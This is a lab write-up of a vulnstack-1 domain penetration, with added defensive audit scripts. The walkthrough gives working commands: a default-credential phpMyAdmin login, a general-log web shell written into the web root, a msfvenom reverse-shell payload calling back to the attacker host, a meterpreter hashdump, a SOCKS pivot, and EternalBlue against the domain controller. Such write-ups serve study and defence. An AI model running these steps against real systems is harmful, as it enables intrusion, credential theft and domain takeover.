vulnstack-1

vulnstack - Domain Penetration

A brief introduction

I've had some free time lately, so I downloaded a vulnstack lab to play with. I'm going to 安恒 for an internship in July, so this is a good moment to work on my pentesting skills.

The lab

vulnstack 1 is the 红日安全 lab. The web server is Win7, the DC is Win2008, and there is one more domain member host, also Win7. The Win7 web server is exposed to the external network and also has a second NIC on the internal segment 192.168.52.0/24; the external segment is 219.217.199.0/24.
Kali is the attacker box at 219.217.199.76


Penetration test

Information gathering

nmap host discovery
nmap -sS 219.217.199.0/24
Found host 219.217.199.112
Browsing to it shows a phpStudy environment --> it hints that phpMyAdmin is installed
Open phpMyAdmin --> phpStudy's default MySQL credentials are root/root; tried them and the login succeeded

phpMyAdmin getshell

The phpStudy index page reveals the site's absolute path: C:/phpstudy/www/
We now have MySQL root, which can write files, and we know the web root --> write a file with SQL
select '' into outfile 'C:/phpstudy/www/HACK.php'
But MySQL has secure_file_priv=NULL, so the shell cannot be written
select @@secure_file_priv; -- query secure_file_priv
-- secure_file_priv=NULL: import/export disabled
-- secure_file_priv='': import/export unrestricted
-- secure_file_priv=/path/: import/export only within that directory
select load_file('c:/phpinfo.php'); -- read a file
select '123' into outfile 'c:/shell.php'; -- write a file
Next idea: MySQL can log every query it executes
Check the logging settings:
show variables like '%general%';
set global general_log = "ON"; -- turn on the query log
set global general_log_file = "C:/phpstudy/WWW/123.php"; -- set the log path; you need the site's physical path first, otherwise even a written shell can't be reached through a URL
Run the SQL
select '' from table_name;
Connect with AntSword to 219.217.199.112/123.php, password f1oat
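Seen from the defender's side, two server settings decided this step: secure_file_priv (which blocked the first attempt) and the query-log path, which any account holding SUPER can repoint at runtime. The audit script below is an added example, not code from the post or from phpStudy; it takes a dict shaped like SHOW GLOBAL VARIABLES output and reports the states that turn MySQL into a file-write primitive. The variable names are the real MySQL ones, while WEB_ROOT, WEAK_VARS and SAFE_VARS are constructed values that mirror the state above (the slow query log is checked too, since it is the same mechanism with a different file).

```python
import posixpath

# Added example (not from the post): audit the MySQL global variables that
# made the file-write and query-log tricks possible. Variable names are the
# real MySQL ones; the sample values are constructed to mirror the post.


def norm_path(path):
    """Normalise a Windows or POSIX path for prefix comparison:
    forward slashes, lower case, no trailing slash."""
    p = posixpath.normpath(str(path).replace("\\", "/").lower())
    return p.rstrip("/") or "/"


def path_under(path, root):
    """True if `path` is `root` itself or lies somewhere beneath it."""
    p, r = norm_path(path), norm_path(root)
    return p == r or p.startswith(r + "/")


def audit_mysql_vars(variables, web_root):
    """Return findings for a dict shaped like SHOW GLOBAL VARIABLES output
    (name -> value). `web_root` is the document root of the web server that
    shares the host with mysqld."""
    findings = []

    # secure_file_priv: NULL disables INTO OUTFILE / LOAD_FILE entirely,
    # '' allows them anywhere, a directory restricts them to that directory.
    sfp = variables.get("secure_file_priv")
    if sfp is None or str(sfp).upper() == "NULL":
        pass  # import/export disabled: this is what blocked the first attempt
    elif sfp == "":
        findings.append("secure_file_priv is empty: INTO OUTFILE / LOAD_FILE "
                        "can reach any path the mysqld account can access")
    elif path_under(sfp, web_root):
        findings.append(f"secure_file_priv ({sfp}) lies inside the web root")

    # Query logs: a log file redirected under the web root turns every logged
    # statement into script source the web server will execute. The slow
    # query log uses the same mechanism, so it gets the same check.
    for switch, file_var in (("general_log", "general_log_file"),
                             ("slow_query_log", "slow_query_log_file")):
        if str(variables.get(switch, "OFF")).upper() != "ON":
            continue
        log_path = str(variables.get(file_var, ""))
        if path_under(log_path, web_root):
            findings.append(f"{switch} is ON and {file_var} ({log_path}) "
                            "lies inside the web root")
        elif not log_path.lower().endswith(".log"):
            # Heuristic: a log that doesn't look like a log has probably
            # been pointed somewhere it shouldn't be.
            findings.append(f"{switch} is ON and {file_var} ({log_path}) "
                            "does not end in .log")
    return findings


# Constructed samples: WEAK_VARS is the state the post creates with
# SET GLOBAL general_log / general_log_file, SAFE_VARS the hardened state.
WEB_ROOT = "C:/phpstudy/www"
WEAK_VARS = {
    "secure_file_priv": "NULL",
    "general_log": "ON",
    "general_log_file": "C:/phpstudy/WWW/123.php",
    "slow_query_log": "OFF",
    "slow_query_log_file": "C:\\phpstudy\\MySQL\\data\\slow.log",
}
SAFE_VARS = dict(WEAK_VARS, general_log="OFF",
                 general_log_file="C:\\phpstudy\\MySQL\\data\\host.log")

if __name__ == "__main__":
    for label, vars_ in (("weak", WEAK_VARS), ("safe", SAFE_VARS)):
        print(label, audit_mysql_vars(vars_, WEB_ROOT) or ["no findings"])
```

Note that secure_file_priv=NULL did its job here; what undid it was the SET GLOBAL on the log path, which requires SUPER (SYSTEM_VARIABLES_ADMIN on MySQL 8). The root cause is therefore the default root/root login exposed through phpMyAdmin, and the fixes follow from that: a real root password, no phpMyAdmin reachable from the outside, and an alert on any change to general_log_file or slow_query_log_file.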

Post-exploitation with msf

Upload a reverse-shell exe payload
msfvenom -p windows/meterpreter/reverse_tcp lhost=219.217.199.76 lport=4444 -f exe > payload.exe
Upload it through the AntSword terminal and run payload.exe
Set up the msf handler for the reverse shell
msf5> use exploit/multi/handler
msf5> set payload windows/meterpreter/reverse_tcp
msf5> show options
msf5> set lhost 219.217.199.76
msf5> exploit
Reverse shell received
ps lists the processes; migrate into another process so an unstable connection doesn't drop the session
getuid
god\administrator
Try privilege escalation with getsystem
msf5> getsystem
Escalation worked, we are now SYSTEM

Internal network information gathering

To push further into the internal network, gather information about it
ipconfig - check the IP addresses
tasklist - list processes
arp - collect the internal IPs this host has talked to, for the next step
net view /domain - show the domain
hashdump
meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
liukaifeng01:1000:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
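The hashdump lines above are in pwdump format (user:RID:LM hash:NT hash:::), and all three carry 31d6cfe0d16ae931b73c59d7e0c089c0 in the NT field, which is the NT hash of an empty password, together with the aad3b435b51404eeaad3b435b51404ee placeholder that means no LM hash is stored. As an added example that is not part of the post, here is the parser and the audit a defender would run over such a dump: it flags blank passwords, the built-in Administrator (RID 500) in particular, and any account that still stores an LM hash. The two extra accounts in the sample and their hash values are constructed placeholders.

```python
import re

# Added example (not from the post): parse hashdump/pwdump lines and flag
# accounts whose stored hashes indicate a blank password or an LM hash.

# NT hash of the empty password (MD4 over the UTF-16LE encoding of "").
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"
# Value stored in the LM field when no LM hash exists (disabled or blank).
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"

PWDUMP_RE = re.compile(
    r"^(?P<user>[^:]+):(?P<rid>\d+):(?P<lm>[0-9a-fA-F]{32}):(?P<nt>[0-9a-fA-F]{32}):::"
)


def parse_pwdump(text):
    """Parse `user:rid:lmhash:nthash:::` lines; lines that don't match
    (prompts, blank lines) are skipped."""
    entries = []
    for line in text.splitlines():
        m = PWDUMP_RE.match(line.strip())
        if not m:
            continue
        entries.append({
            "user": m.group("user"),
            "rid": int(m.group("rid")),
            "lm": m.group("lm").lower(),
            "nt": m.group("nt").lower(),
        })
    return entries


def audit_hashes(entries):
    """Return (user, [issues]) for every account with something to fix."""
    findings = []
    for e in entries:
        issues = []
        if e["nt"] == EMPTY_NT:
            issues.append("blank-password")
            if e["rid"] == 500:
                issues.append("builtin-administrator-blank")
        if e["lm"] != EMPTY_LM:
            issues.append("lm-hash-stored")  # LM hashes are trivially crackable
        if issues:
            findings.append((e["user"], issues))
    return findings


def all_blank(entries):
    """True when every parsed account carries the empty-password NT hash.
    A dump like that deserves a second look before it is reported as
    'all passwords blank': verify the accounts independently."""
    return bool(entries) and all(e["nt"] == EMPTY_NT for e in entries)


# Constructed sample: the three lines the post shows, plus two invented
# accounts (their hash values are placeholders, not real hashes of anything).
SAMPLE_DUMP = """\
meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
liukaifeng01:1000:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
svc_backup:1001:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef:::
legacy:1002:fedcba9876543210fedcba9876543210:0123456789abcdef0123456789abcdef:::
"""

if __name__ == "__main__":
    parsed = parse_pwdump(SAMPLE_DUMP)
    for user, issues in audit_hashes(parsed):
        print(f"{user}: {', '.join(issues)}")
    print("every account blank:", all_blank(parsed))
```

The same two constants are what a SIEM rule or a password-audit job keys on: an NT field equal to EMPTY_NT is a blank password, and an LM field that is anything other than EMPTY_LM means LM hashing is still enabled on that machine (the NoLMHash policy is the fix).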
meterpreter > arp

ARP cache

IP address       MAC address        Interface
----------       -----------        ---------
169.254.255.255  ff:ff:ff:ff:ff:ff  24
192.168.52.138   00:0c:29:3f:5d:a9  11
192.168.52.255   ff:ff:ff:ff:ff:ff  11
219.217.199.16   18:31:bf:43:84:78  25
219.217.199.76   08:00:27:5c:65:26  25
219.217.199.254  00:1a:a9:c3:58:43  25
219.217.199.255  ff:ff:ff:ff:ff:ff  25
224.0.0.2        00:00:00:00:00:00  1
224.0.0.2        01:00:5e:00:00:02  24
224.0.0.2        01:00:5e:00:00:02  11
224.0.0.2        01:00:5e:00:00:02  14
224.0.0.2        01:00:5e:00:00:02  22
224.0.0.2        01:00:5e:00:00:02  23
224.0.0.2        01:00:5e:00:00:02  25
224.0.0.22       00:00:00:00:00:00  1
224.0.0.22       01:00:5e:00:00:16  24
224.0.0.22       01:00:5e:00:00:16  11
224.0.0.22       01:00:5e:00:00:16  14
224.0.0.22       01:00:5e:00:00:16  22
224.0.0.22       01:00:5e:00:00:16  23
224.0.0.22       01:00:5e:00:00:16  25
224.0.0.252      01:00:5e:00:00:fc  24
224.0.0.252      01:00:5e:00:00:fc  11
224.0.0.252      01:00:5e:00:00:fc  25
239.255.255.250  00:00:00:00:00:00  1
239.255.255.250  01:00:5e:7f:ff:fa  11
239.255.255.250  01:00:5e:7f:ff:fa  25
255.255.255.255  ff:ff:ff:ff:ff:ff  24
255.255.255.255  ff:ff:ff:ff:ff:ff  25

There is a 192 segment and a 219 segment
The 192 segment should be the internal network
Listing processes with ps already told us the domain name is GOD
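What the author reads off the ARP cache by eye (one interface on a 219 segment, another on a 192 segment) is also the check a responder runs to find dual-homed machines that bridge an exposed segment and an internal one. The script below is an added example, not code from the post or from Metasploit: it parses the meterpreter arp table and groups real unicast neighbours by interface and /24, dropping multicast, link-local and broadcast entries because they say nothing about reachable hosts. The sample table is a trimmed copy of the one above.

```python
import ipaddress
from collections import defaultdict

# Added example (not from the post): turn a meterpreter `arp` dump into the
# list of subnets the host is attached to.

NO_MAC = {"ff:ff:ff:ff:ff:ff", "00:00:00:00:00:00"}


def parse_arp_table(text):
    """Return (ip, mac, interface) rows from the `IP address  MAC address
    Interface` table; header and separator lines are dropped because they
    don't parse as addresses."""
    rows = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 3:
            continue
        try:
            ip = ipaddress.ip_address(parts[0])
        except ValueError:
            continue
        rows.append((ip, parts[1].lower(), parts[2]))
    return rows


def neighbour_segments(rows, prefix=24):
    """Group real unicast neighbours by (interface, /prefix network).
    Multicast, link-local and broadcast entries carry no information about
    reachable hosts, so they are skipped."""
    segments = defaultdict(set)
    for ip, mac, iface in rows:
        if ip.is_multicast or ip.is_link_local or mac in NO_MAC:
            continue
        network = ipaddress.ip_network(f"{ip}/{prefix}", strict=False)
        segments[(iface, network)].add(ip)
    return {key: sorted(hosts) for key, hosts in segments.items()}


def bridged_networks(rows):
    """Distinct networks the host talks to directly; more than one entry
    means the host is dual-homed."""
    return sorted({network for _, network in neighbour_segments(rows)})


# Constructed sample, trimmed from the post's ARP cache.
SAMPLE_ARP = """\
IP address       MAC address        Interface
----------       -----------        ---------
169.254.255.255  ff:ff:ff:ff:ff:ff  24
192.168.52.138   00:0c:29:3f:5d:a9  11
192.168.52.255   ff:ff:ff:ff:ff:ff  11
219.217.199.16   18:31:bf:43:84:78  25
219.217.199.76   08:00:27:5c:65:26  25
219.217.199.254  00:1a:a9:c3:58:43  25
219.217.199.255  ff:ff:ff:ff:ff:ff  25
224.0.0.2        01:00:5e:00:00:02  11
239.255.255.250  01:00:5e:7f:ff:fa  25
255.255.255.255  ff:ff:ff:ff:ff:ff  24
"""

if __name__ == "__main__":
    table = parse_arp_table(SAMPLE_ARP)
    for (iface, network), hosts in neighbour_segments(table).items():
        print(f"interface {iface}: {network} -> {', '.join(map(str, hosts))}")
    print("dual-homed:", len(bridged_networks(table)) > 1)
```

Run against the post's full table it yields exactly two networks, which is the whole reason this host is worth pivoting through and, from the other side, the reason a web server should never carry a second NIC into the domain segment.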

Set up a proxy for information gathering across segments

msf5 exploit(multi/handler) > use auxiliary/server/socks4a
msf5 auxiliary(server/socks4a) > show options

Module options (auxiliary/server/socks4a):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  0.0.0.0          yes       The address to listen on
   SRVPORT  1080             yes       The port to listen on.

Auxiliary action:

   Name   Description
   ----   -----------
   Proxy  Run SOCKS4a proxy

msf5> sessions -i 1
meterpreter > run autoroute -s 192.168.52.0/24    -- add a route to the internal segment through this session
Back on the Kali terminal
vi /etc/proxychains.conf
Add
socks4 219.217.199.76 1080


Port-scan host .138 through proxychains

root@kali:~# proxychains3 nmap -sT -Pn 192.168.52.138 -p 21,22,80,89,161,389,443,445,1443,1521,3306,3389,6379,8000,8080,9000 --open
ProxyChains-3.1 (http://proxychains.sf.net)
Starting Nmap 7.80 ( https://nmap.org ) at 2021-03-14 23:40 EDT
|S-chain|-<>-219.217.199.76:1080-<><>-192.168.52.138:445-<><>-OK
|S-chain|-<>-219.217.199.76:1080-<><>-192.168.52.138:80-<><>-OK
|S-chain|-<>-219.217.199.76:1080-<><>-192.168.52.138:443-<--timeout
|S-chain|-<>-219.217.199.76:1080-<><>-192.168.52.138:8080-<--timeout
|S-chain|-<>-219.217.199.76:1080-<><>-192.168.52.138:3389-<--timeout
|S-chain|-<>-219.217.199.76:1080-<><>-192.168.52.138:22-<--timeout
|S-chain|-<>-219.217.199.76:1080-<><>-192.168.52.138:3306-<--timeout
|S-chain|-<>-219.217.199.76:1080-<><>-192.168.52.138:21-<--timeout
|S-chain|-<>-219.217.199.76:1080-<><>-192.168.52.138:389-<><>-OK
|S-chain|-<>-219.217.199.76:1080-<><>-192.168.52.138:1443-<--timeout
|S-chain|-<>-219.217.199.76:1080-<><>-192.168.52.138:1521-<--timeout
|S-chain|-<>-219.217.199.76:1080-<><>-192.168.52.138:9000-<--timeout
|S-chain|-<>-219.217.199.76:1080-<><>-192.168.52.138:6379-<--timeout
|S-chain|-<>-219.217.199.76:1080-<><>-192.168.52.138:8000-<--timeout
|S-chain|-<>-219.217.199.76:1080-<><>-192.168.52.138:89-<--timeout
|S-chain|-<>-219.217.199.76:1080-<><>-192.168.52.138:161-<--timeout
Nmap scan report for 192.168.52.138
Host is up (0.11s latency).
Not shown: 13 closed ports
PORT    STATE SERVICE
80/tcp  open  http
389/tcp open  ldap
445/tcp open  microsoft-ds
Port 445 is open, so the host may be vulnerable to EternalBlue (MS17-010)
msf5> search ms17_010
msf5> use auxiliary/scanner/smb/smb_ms17_010
msf5 auxiliary(scanner/smb/smb_ms17_010) > show options

Module options (auxiliary/scanner/smb/smb_ms17_010):

   Name         Current Setting                   Required  Description
   ----         ---------------                   --------  -----------
   CHECK_ARCH   true                              no        Check for architecture on vulnerable hosts
   CHECK_DOPU   true                              no        Check for DOUBLEPULSAR on vulnerable hosts
   CHECK_PIPE   false                             no        Check for named pipe on vulnerable hosts
   NAMED_PIPES  /opt/metasploit-framework/embedd  yes       List of named pipes to check
                ed/framework/data/wordlists/name
                d_pipes.txt
   RHOSTS                                         yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:
   RPORT        445                               yes       The SMB service port (TCP)
   SMBDomain    .                                 no        The Windows domain to use for authentication
   SMBPass                                        no        The password for the specified username
   SMBUser                                        no        The username to authenticate as
   THREADS      1                                 yes       The number of concurrent threads (max one per host)

msf5 auxiliary(scanner/smb/smb_ms17_010) > set rhosts 192.168.52.138
rhosts => 192.168.52.138
msf5 auxiliary(scanner/smb/smb_ms17_010) > exploit
The scanner reports the host as vulnerable to MS17-010
msf5 auxiliary(scanner/smb/smb_ms17_010) > use exploit/windows/smb/ms17_010_eternalblue
Set rhosts --> exploit
DC owned


Afterword

Sometimes EternalBlue doesn't work because of network connectivity and you have to try several times. Due to time and network constraints I didn't do any persistence afterwards; in a few days I plan to go through it again with Cobalt Strike and do a golden ticket, lateral movement to domain members with pth, and so on.
Tips:
Techniques used:
writing a shell with SQL statements
phpMyAdmin getshell via the query log
generating a reverse-shell payload with msf
adding a route in msf for cross-segment pentesting
and using msf exploit modules against the domain controller
